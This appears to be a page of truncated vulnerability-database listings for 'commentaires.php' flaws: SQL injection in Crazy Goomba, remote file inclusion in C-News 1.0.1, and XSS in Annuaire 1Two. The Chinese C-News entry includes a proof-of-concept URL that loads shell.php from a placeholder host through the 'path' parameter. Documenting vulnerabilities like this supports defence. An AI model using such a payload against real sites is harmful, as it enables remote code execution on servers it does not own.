Sql injection

SQL injection vulnerability in commentaires.php in Crazy Goomba 1.2.1 allows remote attackers to execute arbitrary SQL commands via the id parameter...

C-News Commentaires.PHP远程文件包含漏洞

C-News是一款基于PHP的新闻管理程序。 C-News不正确过滤用户提交的URI数据，远程攻击者可以利用漏洞以WEB进程权限执行任意命令。 问题是由于'Commentaires.PHP'脚本对用户提交的'path'参数缺少过滤，提交恶意的远程服务器作为包含对象，可导致以WEB进程权限执行任意PHP代码。 C-News C-News 1.0.1 http://www.c-news.fr/ http://www.example.com/Script Path/affichage/commentaires.php?path=http://www.example2.com/shell.php...

C-News <= 1.0.1 (path) Remote File Inclusion Vulnerability

No description provided by source. ============================================================================================== C-News = v1.0.1 path Remote File Inclusion Exploit =============================================================================================== Critical Level :...

C-News 1.0.1 - path Remote File Inclusion

C-News 1.0.1 - path Remote File Inclusion ============================================================================================== C-News = v1.0.1 path Remote File Inclusion Exploit =============================================================================================== Critical Leve...

CVE-2005-1975

Multiple cross-site scripting XSS vulnerabilities in Annuaire 1Two 1.1 and earlier allow remote attackers to inject arbitrary web script or HTML via 1 the id parameter to index.php, or the 2 siteid, 3 nom, 4 email, or 5 commentaire parameters in commentaires.php...